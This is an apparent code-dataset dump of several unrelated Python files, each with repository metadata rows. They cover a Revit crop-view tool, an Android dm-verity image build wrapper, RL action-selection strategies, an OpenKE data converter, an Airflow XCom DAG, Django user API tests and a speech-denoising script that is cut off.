angle = main_vector.AngleTo(second_vector)
sign = 1 if main_vector.CrossProduct(second_vector).Z >= 0 else -1
return sign * angle
def rotate_by_point_and_angle(vector, origin, angle):
"""
Rotate vector at origin to angle
:param vector: DB.XYZ
:param origin: DB.XYZ of origin
:param angle: Angle to rotate
:type angle: float
:return: DB.XYZ
"""
transform = DB.Transform.CreateRotationAtPoint(DB.XYZ.BasisZ, angle, origin)
rot_vector = transform.OfPoint(vector)
return rot_vector
def calc_x_y_section(view, point):
"""
Calculate point coordinate in plane of section view
- Calculate offset of view origin
- Get shift in plane of view
- Transform Z value to Y
:param view: DB.ViewSection
:param point: DB.XYZ
:return: DB.XYZ in plane view
"""
height = (point - view.Origin).Z
normal_val = point - view.Origin - height * DB.XYZ.BasisZ
length = normal_val.GetLength()
sign = 1 if view.ViewDirection.CrossProduct(normal_val).Z >= 0 else -1
new_point = DB.XYZ(sign * length, height, 0)
return new_point
def calc_up_down(p_first, p_second):
"""
Convert point for up_right and down_left
:param p_first: DB.XYZ
:param p_second: DB.XYZ
:return: (DB.XYZ, DB.XYZ)
:rtype: tuple
"""
p_left = DB.XYZ(min(p_first.X, p_second.X),
min(p_first.Y, p_second.Y),
0)
p_right = DB.XYZ(max(p_first.X, p_second.X),
max(p_first.Y, p_second.Y),
0)
return p_left, p_right
def calc_point_by_handler(view, first, second, handler):
"""
Calculate points for box by handler
- Calculate in plane
- Modify to up_right and down_left
:param view: DB.View
:param first: DB.XYZ
:param second: DB.XYZ
:param handler: Func for transform point for view
:type handler: lambda view, point: pass
:return: (DB.XYZ, DB.XYZ)
:rtype: tuple
"""
p_first, p_second = handler(view, first), handler(view, second)
p_min, p_max = calc_up_down(p_first, p_second)
return p_min, p_max
def edit_crop(view):
"""
Edit crop view
:param view:
:type view:
:return:
:rtype:
"""
if view.ViewType in VALID_VIEW_TYPE:
handler = VALID_VIEW_TYPE[view.ViewType]
else:
raise NotImplementedError('View type "{}" not designed'.format(doc.ActiveView.ViewType))
first, second = box_selection()
p_min, p_max = calc_point_by_handler(view, first, second, handler)
set_view_crop_by_point(view, p_min, p_max)
VALID_VIEW_TYPE = {
DB.ViewType.Section: calc_x_y_section,
DB.ViewType.Elevation: calc_x_y_section,
DB.ViewType.EngineeringPlan: calc_x_y_plan,
DB.ViewType.FloorPlan: calc_x_y_plan,
}
def main():
view = doc.ActiveView
edit_crop(view)
if __name__ == '__main__':
logger.setLevel(50)
try:
main()
except Exception as err:
task_dialog(msg=str(err.args[0]) + '\nPlease, write Nikita')
| 23.242991 | 96 | 0.65581 | 0 | 0 | 0 | 0 | 403 | 0.081021 | 0 | 0 | 1,955 | 0.393044 |
2bad9543f61fe85bae0ab93637dfc67e43dc0ae6 | 1,876 | py | Python | dm_verity_make_ext4fs.py | bigb123/samsung-android_bootable_recovery_libdmverity | 2f9ce00f76ed4f1a251d5244ae2533cf53417478 | [
"MIT"
] | 1 | 2020-06-28T00:49:21.000Z | 2020-06-28T00:49:21.000Z | dm_verity_make_ext4fs.py | bigb123/samsung-android_bootable_recovery_libdmverity | 2f9ce00f76ed4f1a251d5244ae2533cf53417478 | [
"MIT"
] | null | null | null | dm_verity_make_ext4fs.py | bigb123/samsung-android_bootable_recovery_libdmverity | 2f9ce00f76ed4f1a251d5244ae2533cf53417478 | [
"MIT"
] | 1 | 2021-03-05T16:54:52.000Z | 2021-03-05T16:54:52.000Z | #! /usr/bin/env python
# make_ext4fs -s -S /home/swei/p4/STA-ESG_SWEI_KLTE_ATT-TRUNK_DMV/android/out/target/product/klteatt/root/file_contexts -l 2654994432 -a system system.img.ext4 system
import os,posixpath,sys,getopt
reserve=1024*1024*32
def run(cmd):
print cmd
# return 0
return os.system(cmd)
def main():
d = posixpath.dirname(sys.argv[0])
make_ext4fs_opt_list = []
optlist, args = getopt.getopt(sys.argv[1:], 'l:j:b:g:i:I:L:a:G:fwzJsctrvS:X:')
if len(args) < 1:
print 'image file not specified'
return -1;
image_file = args[0]
length = None
sparse = False
for o, a in optlist:
if '-l' == o:
length = int(a)
make_ext4fs_opt_list.append(o)
make_ext4fs_opt_list.append(str(length-reserve))
elif '-s' == o:
sparse = True
make_ext4fs_opt_list.append(o)
else:
make_ext4fs_opt_list.append(o)
if len(a) > 0:
make_ext4fs_opt_list.append(a)
if not sparse:
print 'we can only handle sparse image format for server generated dmverity for now'
return -1
if None == length:
print 'size of system image not taken'
return -1
make_ext4fs_opt_list.extend(args)
cmd = os.path.join(d, 'make_ext4fs') + ' ' +' '.join(make_ext4fs_opt_list)
if(0 != run(cmd)):
print 'failed!'
return -1;
cmd = ' '.join(['img_dm_verity', '/dev/block/platform/15540000.dwmmc0/by-name/SYSTEM', str(length), image_file, image_file+'.tmp'])
if(0 != run(cmd)):
print 'failed!'
return -1;
cmd = ' '.join(['mv', image_file+'.tmp', image_file])
if(0 != run(cmd)):
print 'failed!'
return -1;
return 0
#return os.system(cmd)
if __name__ == "__main__":
ret = main()
sys.exit(ret)
| 28.861538 | 166 | 0.587953 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 545 | 0.290512 |
2baea66c9dda1164b219c75b1a324b8723e5a8b9 | 2,787 | py | Python | rl/policies/action_selection_strategy.py | Sen-R/reinforcement-learning | 493788132f991d294b425cbf34c5673fbd18c8dd | [
"MIT"
] | null | null | null | rl/policies/action_selection_strategy.py | Sen-R/reinforcement-learning | 493788132f991d294b425cbf34c5673fbd18c8dd | [
"MIT"
] | null | null | null | rl/policies/action_selection_strategy.py | Sen-R/reinforcement-learning | 493788132f991d294b425cbf34c5673fbd18c8dd | [
"MIT"
] | null | null | null | """Strategies for selecting actions for value-based policies."""
from abc import ABC, abstractmethod
from typing import List, Optional
from numpy.typing import ArrayLike
import numpy as np
from rl.action_selectors import (
ActionSelector,
DeterministicActionSelector,
UniformDiscreteActionSelector,
NoisyActionSelector,
)
class ActionSelectionStrategy(ABC):
"""Base class for action selection strategies."""
@abstractmethod
def __call__(
self,
action_values: List[float],
action_counts: List[int],
) -> ActionSelector:
pass
class EpsilonGreedy(ActionSelectionStrategy):
"""Implementation of epsilon greedy action selection.
Args:
epsilon: probability of taking action to explore rather than exploing
random_state: `None`, `int`, or `np.random.Generator` to initialise
RNG
"""
def __init__(self, epsilon: float = 0.0, random_state=None):
self.epsilon = epsilon
self._rng = np.random.default_rng(random_state)
def __call__(
self,
action_values: List[float],
action_counts: Optional[List[int]] = None,
) -> NoisyActionSelector:
"""Action counts do not matter for this strategy."""
greedy_action = int(np.argmax(action_values))
preferred = DeterministicActionSelector(greedy_action)
noise = UniformDiscreteActionSelector(
len(action_values), random_state=self._rng
)
return NoisyActionSelector(
self.epsilon, preferred, noise, random_state=self._rng
)
class UCB(ActionSelectionStrategy):
"""Upper confidence bound action selection strategy.
As defined in Sutton & Barto equation 2.10. However we floor action
counts at `eps` to avoid divide-by-zero.
`t` is inferred by summing the action counts vector and adding 1.
(Because `t` refers to the time step at which action values are being
estimated, i.e. the next time step since the last observation).
Args:
c: confidence parameter
eps: small number to floor zero counts at
"""
def __init__(self, c: float, eps: float = 1.0e-8):
self.c = c
self._eps = eps
def __call__(
self,
action_values: List[float],
action_counts: List[int],
) -> DeterministicActionSelector:
chosen_action = int(np.argmax(self.ucb(action_values, action_counts)))
return DeterministicActionSelector(chosen_action)
def ucb(
self,
action_values: List[float],
action_counts: List[int],
) -> ArrayLike:
log_t = np.log(np.sum(action_counts) + 1)
floored_counts = np.maximum(action_counts, self._eps)
return action_values + self.c * np.sqrt(log_t / floored_counts)
| 30.626374 | 78 | 0.670972 | 2,439 | 0.875135 | 0 | 0 | 155 | 0.055615 | 0 | 0 | 879 | 0.315393 |
2baeca8d8ff61c43fa93b0a9c182df48e8c05900 | 8,543 | py | Python | create_data_for_openke.py | nhutnamhcmus/KGC-Benchmark-Datasets | febed9fcc8c715c4dbdbce89a5355f7387c4c6ce | [
"Apache-2.0"
] | null | null | null | create_data_for_openke.py | nhutnamhcmus/KGC-Benchmark-Datasets | febed9fcc8c715c4dbdbce89a5355f7387c4c6ce | [
"Apache-2.0"
] | null | null | null | create_data_for_openke.py | nhutnamhcmus/KGC-Benchmark-Datasets | febed9fcc8c715c4dbdbce89a5355f7387c4c6ce | [
"Apache-2.0"
] | 1 | 2022-02-20T03:29:07.000Z | 2022-02-20T03:29:07.000Z | import pandas as pd
import numpy as np
from argparse import ArgumentParser
parser = ArgumentParser("Python scirpt for OpenKE dataset initialization.")
parser.add_argument("--folder", default="WN18RR/",
help="Name of dataset folder.")
args = parser.parse_args()
print(args)
def getID(folder='FB122/'):
lstEnts = {}
lstRels = {}
with open(folder + 'train.txt') as f, open(folder + 'train_marked.txt', 'w') as f2:
count = 0
for line in f:
line = line.strip().split()
line = [i.strip() for i in line]
# print(line[0], line[1], line[2])
if line[0] not in lstEnts:
lstEnts[line[0]] = len(lstEnts)
if line[1] not in lstRels:
lstRels[line[1]] = len(lstRels)
if line[2] not in lstEnts:
lstEnts[line[2]] = len(lstEnts)
count += 1
f2.write(str(line[0]) + '\t' + str(line[1]) +
'\t' + str(line[2]) + '\n')
print("Size of train_marked set set ", count)
with open(folder + 'valid.txt') as f, open(folder + 'valid_marked.txt', 'w') as f2:
count = 0
for line in f:
line = line.strip().split()
line = [i.strip() for i in line]
# print(line[0], line[1], line[2])
if line[0] not in lstEnts:
lstEnts[line[0]] = len(lstEnts)
if line[1] not in lstRels:
lstRels[line[1]] = len(lstRels)
if line[2] not in lstEnts:
lstEnts[line[2]] = len(lstEnts)
count += 1
f2.write(str(line[0]) + '\t' + str(line[1]) +
'\t' + str(line[2]) + '\n')
print("Size of VALID_marked set set ", count)
with open(folder + 'test.txt') as f, open(folder + 'test_marked.txt', 'w') as f2:
count = 0
for line in f:
line = line.strip().split()
line = [i.strip() for i in line]
# print(line[0], line[1], line[2])
if line[0] not in lstEnts:
lstEnts[line[0]] = len(lstEnts)
if line[1] not in lstRels:
lstRels[line[1]] = len(lstRels)
if line[2] not in lstEnts:
lstEnts[line[2]] = len(lstEnts)
count += 1
f2.write(str(line[0]) + '\t' + str(line[1]) +
'\t' + str(line[2]) + '\n')
print("Size of test_marked set set ", count)
wri = open(folder + 'entity2id.txt', 'w')
wri.write(str(len(lstEnts)))
wri.write('\n')
for entity in lstEnts:
wri.write(entity + '\t' + str(lstEnts[entity]))
wri.write('\n')
wri.close()
wri = open(folder + 'relation2id.txt', 'w')
wri.write(str(len(lstRels)))
wri.write('\n')
for entity in lstRels:
wri.write(entity + '\t' + str(lstRels[entity]))
wri.write('\n')
wri.close()
print("[LOG] Init entity and relation id.")
getID(folder=args.folder)
print("[LOG] Read entity and relation id.")
entity2id = pd.read_table(args.folder+"entity2id.txt", header=None, sep='\t', skiprows=1)
relation2id = pd.read_table(args.folder+"relation2id.txt", header=None, sep='\t', skiprows=1)
print("[LOG] Read train, test and validation set.")
train = pd.read_table(args.folder+"/train.txt", header=None, sep='\t')
test = pd.read_table(args.folder+"/test.txt", header=None, sep='\t')
valid = pd.read_table(args.folder+"/valid.txt", header=None, sep='\t')
train[[1, 2]] = train[[2, 1]]
valid[[1, 2]] = valid[[2, 1]]
test[[1, 2]] = test[[2, 1]]
d = dict(zip(relation2id[0].values, relation2id[1].values))
e = dict(zip(entity2id[0].values, entity2id[1].values))
print("[LOG] Mapping train, validation and test data with id.")
def mapping(data):
data[0] = data[0].map(e)
data[1] = data[1].map(e)
data[2] = data[2].map(d)
mapping(train)
mapping(valid)
mapping(test)
train_file = open(args.folder+"/train2id.txt", "w")
train_file.write("%d\n" % (train.shape[0]))
train.to_csv(train_file, header=None, index=None, sep=" ", mode='a')
train_file.close()
valid_file = open(args.folder+"/valid2id.txt", "w")
valid_file.write("%d\n" % (valid.shape[0]))
valid.to_csv(valid_file, header=None, index=None, sep=" ", mode='a')
valid_file.close()
test_file = open(args.folder+"/test2id.txt", "w")
test_file.write("%d\n" % (test.shape[0]))
test.to_csv(test_file, header=None, index=None, sep=" ", mode='a')
test_file.close()
lef = {}
rig = {}
rellef = {}
relrig = {}
triple = open(args.folder+"train2id.txt", "r")
valid = open(args.folder+"valid2id.txt", "r")
test = open(args.folder+"test2id.txt", "r")
print("[LOG] Training file reading ... ")
tot = (int)(triple.readline())
print("[LOG] Total training file: {}".format(tot))
for i in range(tot):
content = triple.readline()
h, t, r = content.strip().split()
if not (h, r) in lef:
lef[(h, r)] = []
if not (r, t) in rig:
rig[(r, t)] = []
lef[(h, r)].append(t)
rig[(r, t)].append(h)
if not r in rellef:
rellef[r] = {}
if not r in relrig:
relrig[r] = {}
rellef[r][h] = 1
relrig[r][t] = 1
print("[LOG] Validation file reading ...")
tot = (int)(valid.readline())
print("[LOG] Total validation file: {}".format(tot))
for i in range(tot):
content = valid.readline()
h, t, r = content.strip().split()
if not (h, r) in lef:
lef[(h, r)] = []
if not (r, t) in rig:
rig[(r, t)] = []
lef[(h, r)].append(t)
rig[(r, t)].append(h)
if not r in rellef:
rellef[r] = {}
if not r in relrig:
relrig[r] = {}
rellef[r][h] = 1
relrig[r][t] = 1
print("[LOG] Test file reading ... ")
tot = (int)(test.readline())
print("[LOG] Total test file: {}".format(tot))
for i in range(tot):
content = test.readline()
h, t, r = content.strip().split()
if not (h, r) in lef:
lef[(h, r)] = []
if not (r, t) in rig:
rig[(r, t)] = []
lef[(h, r)].append(t)
rig[(r, t)].append(h)
if not r in rellef:
rellef[r] = {}
if not r in relrig:
relrig[r] = {}
rellef[r][h] = 1
relrig[r][t] = 1
test.close()
valid.close()
triple.close()
print("[LOG] Type constraint processing ... ")
f = open(args.folder+"type_constrain.txt", "w")
f.write("%d\n" % (len(rellef)))
for i in rellef:
f.write("%s\t%d" % (i, len(rellef[i])))
for j in rellef[i]:
f.write("\t%s" % (j))
f.write("\n")
f.write("%s\t%d" % (i, len(relrig[i])))
for j in relrig[i]:
f.write("\t%s" % (j))
f.write("\n")
f.close()
rellef = {}
totlef = {}
relrig = {}
totrig = {}
# lef: (h, r)
# rig: (r, t)
for i in lef:
if not i[1] in rellef:
rellef[i[1]] = 0
totlef[i[1]] = 0
rellef[i[1]] += len(lef[i])
totlef[i[1]] += 1.0
for i in rig:
if not i[0] in relrig:
relrig[i[0]] = 0
totrig[i[0]] = 0
relrig[i[0]] += len(rig[i])
totrig[i[0]] += 1.0
s11 = 0
s1n = 0
sn1 = 0
snn = 0
f = open(args.folder+"test2id.txt", "r")
tot = (int)(f.readline())
for i in range(tot):
content = f.readline()
h, t, r = content.strip().split()
rign = rellef[r] / totlef[r]
lefn = relrig[r] / totrig[r]
if (rign < 1.5 and lefn < 1.5):
s11 += 1
if (rign >= 1.5 and lefn < 1.5):
s1n += 1
if (rign < 1.5 and lefn >= 1.5):
sn1 += 1
if (rign >= 1.5 and lefn >= 1.5):
snn += 1
f.close()
print("[LOG] Relational type processing ...")
f = open(args.folder+"test2id.txt", "r")
f11 = open(args.folder+"1-1.txt", "w")
f1n = open(args.folder+"1-n.txt", "w")
fn1 = open(args.folder+"n-1.txt", "w")
fnn = open(args.folder+"n-n.txt", "w")
fall = open(args.folder+"test2id_all.txt", "w")
tot = (int)(f.readline())
fall.write("%d\n" % (tot))
f11.write("%d\n" % (s11))
f1n.write("%d\n" % (s1n))
fn1.write("%d\n" % (sn1))
fnn.write("%d\n" % (snn))
for i in range(tot):
content = f.readline()
h, t, r = content.strip().split()
rign = rellef[r] / totlef[r]
lefn = relrig[r] / totrig[r]
if (rign < 1.5 and lefn < 1.5):
f11.write(content)
fall.write("0"+"\t"+content)
if (rign >= 1.5 and lefn < 1.5):
f1n.write(content)
fall.write("1"+"\t"+content)
if (rign < 1.5 and lefn >= 1.5):
fn1.write(content)
fall.write("2"+"\t"+content)
if (rign >= 1.5 and lefn >= 1.5):
fnn.write(content)
fall.write("3"+"\t"+content)
fall.close()
f.close()
f11.close()
f1n.close()
fn1.close()
fnn.close()
print("[LOG] Shutdown processing ...") | 29.357388 | 93 | 0.540677 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,433 | 0.16774 |
2bafdb3d0198af653fa5dcfa1e0681df79a2f730 | 174 | py | Python | tests/iter_version_dev/V1_0_0/demo.py | liguodongIOT/nlp-app-samples | e0cc747e88c7b5c701b5099462d2dd6277c23381 | [
"Apache-2.0"
] | 1 | 2021-09-30T08:16:21.000Z | 2021-09-30T08:16:21.000Z | tests/iter_version_dev/V1_0_0/demo.py | liguodongIOT/nlp-app-samples | e0cc747e88c7b5c701b5099462d2dd6277c23381 | [
"Apache-2.0"
] | null | null | null | tests/iter_version_dev/V1_0_0/demo.py | liguodongIOT/nlp-app-samples | e0cc747e88c7b5c701b5099462d2dd6277c23381 | [
"Apache-2.0"
] | 1 | 2021-11-24T06:24:44.000Z | 2021-11-24T06:24:44.000Z | from nlp_app_samples.constants import APP_NAME
from tests.iter_version_dev.V1_0_0.classification_lr import TASK_DICT
print(APP_NAME)
print(TASK_DICT)
print("over....")
| 14.5 | 69 | 0.810345 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 | 0.057471 |
2bb18f8af966069191addc5d4539af9522722cdb | 2,392 | py | Python | airflow/dags/xcom_dag.py | KoiDev13/airflow_lab | 40ce005615486356a59deff46f3594b2343a8b4d | [
"Apache-2.0"
] | null | null | null | airflow/dags/xcom_dag.py | KoiDev13/airflow_lab | 40ce005615486356a59deff46f3594b2343a8b4d | [
"Apache-2.0"
] | null | null | null | airflow/dags/xcom_dag.py | KoiDev13/airflow_lab | 40ce005615486356a59deff46f3594b2343a8b4d | [
"Apache-2.0"
] | null | null | null | from airflow import DAG
from airflow.operators.bash import BashOperator
from airflow.operators.python import PythonOperator, BranchPythonOperator #Looking for a way to choose one task or another according to condition
# from airflow.operators.subdag import SubDagOperator
from airflow.utils.task_group import TaskGroup #Create multiple tasks in a group
from airflow.operators.dummy import DummyOperator #For dummy test
from random import uniform
from datetime import datetime
default_args = {
'start_date': datetime(2020, 1, 1)
}
def _training_model(ti):
accuracy = uniform(0.1, 10.0) #Uniform method from random
print(f'model\'s accuracy: {accuracy}')
ti.xcom_push(key='model_accuracy', value=accuracy) #truyền tham số xcom vào kết quả return
def _choose_best_model(ti):
print('choose best model')
accuracies=ti.xcom_pull(key='model_accuracy', task_ids=[
'processing_tasks.training_model_a',
'processing_tasks.training_model_b',
'processing_tasks.training_model_c'
])
for accuracy in accuracies:
if accuracy > 5:
return 'accurate'
return 'inaccurate'
print(accuracies)
with DAG('xcom_dag', schedule_interval='@daily', default_args=default_args, catchup=False) as dag:
downloading_data = BashOperator(
task_id='downloading_data',
bash_command='sleep 3',
do_xcom_push=False
)
with TaskGroup('processing_tasks') as processing_tasks:
training_model_a = PythonOperator(
task_id='training_model_a',
python_callable=_training_model
)
training_model_b = PythonOperator(
task_id='training_model_b',
python_callable=_training_model
)
training_model_c = PythonOperator(
task_id='training_model_c',
python_callable=_training_model #automatically push to xcom
)
choose_model = BranchPythonOperator(
task_id='choose_best_model',
python_callable=_choose_best_model
)
accurate = DummyOperator(
task_id = 'accurate',
)
inaccurate = DummyOperator(
task_id = 'inaccurate',
)
storing = DummyOperator(
task_id='storing',
trigger_rule = 'none_failed_or_skipped'
)
downloading_data >> processing_tasks >> choose_model
choose_model >> [accurate, inaccurate] >> storing | 31.473684 | 145 | 0.69607 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 687 | 0.286131 |
2bb1dccf1a33e636469d941a73447ed64a4e5e90 | 9,281 | py | Python | v1/users/tests/user.py | buckyroberts/Website-API | e74d202a41533c7622acbe12c793d047d44012ad | [
"MIT"
] | 64 | 2020-10-02T02:58:06.000Z | 2022-01-29T20:00:50.000Z | v1/users/tests/user.py | buckyroberts/Website-API | e74d202a41533c7622acbe12c793d047d44012ad | [
"MIT"
] | 93 | 2020-10-04T22:53:46.000Z | 2022-03-05T18:17:46.000Z | v1/users/tests/user.py | buckyroberts/Website-API | e74d202a41533c7622acbe12c793d047d44012ad | [
"MIT"
] | 21 | 2020-10-11T14:16:13.000Z | 2021-11-09T17:50:25.000Z | from unittest.mock import ANY, MagicMock, patch
from django.utils.encoding import force_bytes
from django.utils.http import urlsafe_base64_encode
from freezegun import freeze_time
from rest_framework import serializers, status
from rest_framework.reverse import reverse
from ..factories.user import UserFactory
from ..models import User
from ...utils.verification import generate_token
def test_anon_delete(api_client):
user = UserFactory()
r = api_client.delete(reverse('user-detail', (user.pk,)))
assert r.status_code == status.HTTP_401_UNAUTHORIZED
def test_anon_list(api_client, django_assert_max_num_queries):
users = UserFactory.create_batch(10)
with django_assert_max_num_queries(2):
r = api_client.get(reverse('user-list'), {'limit': 0})
assert r.status_code == status.HTTP_200_OK
assert len(r.data) == 10
assert r.data[0] == {
'account_number': users[0].account_number,
'created_date': serializers.DateTimeField().to_representation(users[0].created_date),
'display_name': users[0].display_name,
'github_username': users[0].github_username,
'is_email_verified': users[0].is_email_verified,
'modified_date': serializers.DateTimeField().to_representation(users[0].modified_date),
'pk': str(users[0].pk),
'profile_image': '',
'discord_username': users[0].discord_username,
}
def test_anon_patch(api_client):
user = UserFactory()
r = api_client.patch(
reverse('user-detail', (user.pk,)),
data={
'display_name': 'Bob'
},
format='json'
)
assert r.status_code == status.HTTP_401_UNAUTHORIZED
@patch('v1.users.views.user.send_account_email', MagicMock(return_value=None))
def test_anon_post(api_client):
with freeze_time() as frozen_time:
r = api_client.post(
reverse('user-list'),
data={
'email': 'bucky@email.com',
'password': 'Pswd43234!',
'display_name': 'Bucky'
},
format='json'
)
assert r.status_code == status.HTTP_201_CREATED
assert r.data == {
'account_number': '',
'created_date': serializers.DateTimeField().to_representation(frozen_time()),
'display_name': 'Bucky',
'github_username': '',
'is_email_verified': False,
'modified_date': serializers.DateTimeField().to_representation(frozen_time()),
'pk': ANY,
'profile_image': '',
'discord_username': '',
}
assert User.objects.get(pk=r.data['pk']).display_name == 'Bucky'
@patch('v1.users.views.user.send_account_email', MagicMock(return_value=None))
def test_user_verification(api_client):
api_client.post(
reverse('user-list'),
data={
'email': 'bucky@email.com',
'password': 'Pswd43234!',
'display_name': 'Bucky'
},
format='json'
)
uid = urlsafe_base64_encode(force_bytes('bucky@email.com'))
token = generate_token('bucky@email.com')
r = api_client.get(reverse('user-list') + '/verify/{}/{}'.format(uid, token),
format='json'
)
assert r.status_code == status.HTTP_200_OK
is_token = 'access_token' in dict(r.data)['authentication']
assert is_token
def test_invalid_token_verification(api_client):
uid = urlsafe_base64_encode(force_bytes('bucky@email.com'))
token = 'randomstring'
r = api_client.get(reverse('user-list') + '/verify/{}/{}'.format(uid, token),
format='json'
)
assert r.status_code == status.HTTP_400_BAD_REQUEST
assert r.data['message'] == 'Token is invalid'
def test_invalid_link_verification(api_client):
uid = urlsafe_base64_encode(force_bytes('bucky@email.com'))
user = UserFactory()
token = generate_token(user.email)
r = api_client.get(reverse('user-list') + '/verify/{}/{}'.format(uid, token),
format='json'
)
assert r.status_code == status.HTTP_400_BAD_REQUEST
assert r.data['message'] == 'Invalid activation link'
def test_invalid_user_verification(api_client):
uid = urlsafe_base64_encode(force_bytes('bucky@email.com'))
token = generate_token('nonregistered@email.com')
r = api_client.get(reverse('user-list') + '/verify/{}/{}'.format(uid, token),
format='json'
)
assert r.status_code == status.HTTP_400_BAD_REQUEST
assert r.data['message'] == 'Invalid user'
@patch('v1.users.views.user.send_account_email', MagicMock(return_value=None))
def test_user_generate_new_link(api_client):
api_client.post(
reverse('user-list'),
data={
'email': 'test@thenewboston.com',
'password': '@secret123',
'display_name': 'Bucky'
},
format='json'
)
r = api_client.post(
reverse('user-list') + '/new-link',
data={
'email': 'test@thenewboston.com',
'req_type': 'verify'
},
format='json'
)
assert r.status_code == status.HTTP_200_OK
assert r.data == {
'mesage': 'A new link has been sent to your email'
}
def test_anon_post_common_password(api_client):
r = api_client.post(
reverse('user-list'),
data={
'email': 'bucky@email.com',
'password': 'pass1234',
'display_name': 'Bucky'
},
format='json'
)
assert r.status_code == status.HTTP_400_BAD_REQUEST
def test_other_user_delete(api_client):
user1 = UserFactory()
user2 = UserFactory()
api_client.force_authenticate(user1)
r = api_client.delete(reverse('user-detail', (user2.pk,)))
assert r.status_code == status.HTTP_403_FORBIDDEN
def test_other_user_patch(api_client):
user1 = UserFactory()
user2 = UserFactory()
api_client.force_authenticate(user1)
r = api_client.patch(
reverse('user-detail', (user2.pk,)),
data={
'display_name': 'Senior Super Dev',
'github_username': 'senior_super_githuber',
'discord_username': 'senior_super_discorder',
},
format='json'
)
assert r.status_code == status.HTTP_403_FORBIDDEN
def test_other_user_post(api_client):
user = UserFactory()
api_client.force_authenticate(user)
r = api_client.post(
reverse('user-list'),
data={
'account_number': '4ed6c42c98a9f9b521f434df41e7de87a1543940121c895f3fb383bb8585d3ec',
'display_name': 'Super Dev',
'github_username': 'super_githuber',
'discord_username': 'super_discorder',
},
format='json'
)
assert r.status_code == status.HTTP_403_FORBIDDEN
def test_self_delete(api_client):
user = UserFactory()
api_client.force_authenticate(user)
r = api_client.delete(reverse('user-detail', (user.pk,)))
assert r.status_code == status.HTTP_403_FORBIDDEN
def test_self_patch(api_client):
user = UserFactory()
api_client.force_authenticate(user)
with freeze_time() as frozen_time:
r = api_client.patch(reverse('user-detail', (user.pk,)), data={
'display_name': 'I am a Senior Super Dev',
'github_username': 'senior_super_githuber',
'discord_username': 'senior_super_discorder',
}, format='json')
assert r.status_code == status.HTTP_200_OK
assert r.data == {
'account_number': user.account_number,
'created_date': serializers.DateTimeField().to_representation(user.created_date),
'display_name': 'I am a Senior Super Dev',
'github_username': 'senior_super_githuber',
'is_email_verified': False,
'modified_date': serializers.DateTimeField().to_representation(frozen_time()),
'pk': str(user.pk),
'profile_image': '',
'discord_username': 'senior_super_discorder',
}
assert User.objects.get(pk=str(user.pk)).display_name == 'I am a Senior Super Dev'
def test_staff_delete(api_client, staff_user):
api_client.force_authenticate(staff_user)
user = UserFactory()
r = api_client.delete(reverse('user-detail', (user.pk,)))
assert r.status_code == status.HTTP_204_NO_CONTENT
assert r.data is None
assert User.objects.filter(pk=str(user.pk)).first() is None
def test_staff_patch(api_client, staff_user):
api_client.force_authenticate(staff_user)
user = UserFactory()
r = api_client.patch(
reverse('user-detail', (user.pk,)),
data={
'display_name': 'Senior Super Dev',
'github_username': 'senior_super_githuber',
'discord_username': 'senior_super_discorder',
},
format='json'
)
assert r.status_code == status.HTTP_403_FORBIDDEN
def test_staff_post(api_client, staff_user):
api_client.force_authenticate(staff_user)
r = api_client.post(
reverse('user-list'),
data={
'email': 'bucky@email.com',
'password': 'Pswd43234!',
'display_name': 'Bucky'
},
format='json'
)
assert r.status_code == status.HTTP_403_FORBIDDEN
| 30.833887 | 97 | 0.632798 | 0 | 0 | 0 | 0 | 2,349 | 0.253098 | 0 | 0 | 2,263 | 0.243831 |
2bb394837f98ad170af7ac4403fbc8f5bff79198 | 272 | py | Python | newbitcoin/newbitcoin/code-ch03/helper.py | tys-hiroshi/test_programmingbitcoin | 6eb6fb1c087f6dd2cb2b01f527488a904065efa6 | [
"MIT"
] | null | null | null | newbitcoin/newbitcoin/code-ch03/helper.py | tys-hiroshi/test_programmingbitcoin | 6eb6fb1c087f6dd2cb2b01f527488a904065efa6 | [
"MIT"
] | null | null | null | newbitcoin/newbitcoin/code-ch03/helper.py | tys-hiroshi/test_programmingbitcoin | 6eb6fb1c087f6dd2cb2b01f527488a904065efa6 | [
"MIT"
] | null | null | null | from unittest import TestSuite, TextTestRunner
import hashlib
def run(test):
suite = TestSuite()
suite.addTest(test)
TextTestRunner().run(suite)
def hash256(s):
'''two rounds of sha256'''
return hashlib.sha256(hashlib.sha256(s).digest()).digest()
| 18.133333 | 62 | 0.694853 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 26 | 0.095588 |
2bb4e9663798a8ab2fb0c77692479485818ee0ff | 3,085 | py | Python | denoise.py | N11K6/Speech_DeNoiser_AE | 66e55faa430a66a74a4df27d9f96b756056047f2 | [
"MIT"
] | 1 | 2021-03-16T08:58:45.000Z | 2021-03-16T08:58:45.000Z | denoise.py | N11K6/Speech_DeNoiser_AE | 66e55faa430a66a74a4df27d9f96b756056047f2 | [
"MIT"
] | null | null | null | denoise.py | N11K6/Speech_DeNoiser_AE | 66e55faa430a66a74a4df27d9f96b756056047f2 | [
"MIT"
] | 1 | 2021-09-22T10:26:28.000Z | 2021-09-22T10:26:28.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Program to denoise a short speech sample using a pre-trained autoencoder.
PATH_TO_TRAINED_MODEL : path to the pre-trained model (.h5)
PATH_TO_AUDIO : path to the noisy audio file (.wav)
PATH_TO_SAVE : path to save the denoised audio output (.wav)
@author: nk
"""
#%% Dependencies
import numpy as np
import librosa
import soundfile
from tensorflow import keras
#%%
PATH_TO_TRAINED_MODEL = "./trained_models/audio_denoise_AE.h5"
PATH_TO_AUDIO = "./audio_files/test_noisy.wav"
PATH_TO_SAVE = "./audio_files/new_denoised.wav"
#%%
class _Denoise_AE:
'''
Singleton class for denoising short audio samples of spoken words.
'''
model = None
_instance = None
# This is the fitting constant, saved from the training session!
fitting_constant = 7.259422170994068
# This is the sample rate that the model is configured to work with.
SAMPLE_RATE = 22050
def preprocess(self, path_to_audio):
'''
Preprocesses audio file located at specified path.
- Fixes length to 1s
- Extracts spectrogram
'''
data, _ = librosa.load(path_to_audio, sr = self.SAMPLE_RATE)
duration = self.SAMPLE_RATE
# Pad to appropriate length...
if len(data) < duration:
max_offset = np.abs(len(data) - duration)
offset = np.random.randint(max_offset)
data = np.pad(data, (offset, duration-len(data)-offset), "constant")
# ... or cut to appropriate length...
elif len(data) > duration:
max_offset = np.abs(len(data) - duration)
offset = np.random.randint(max_offset)
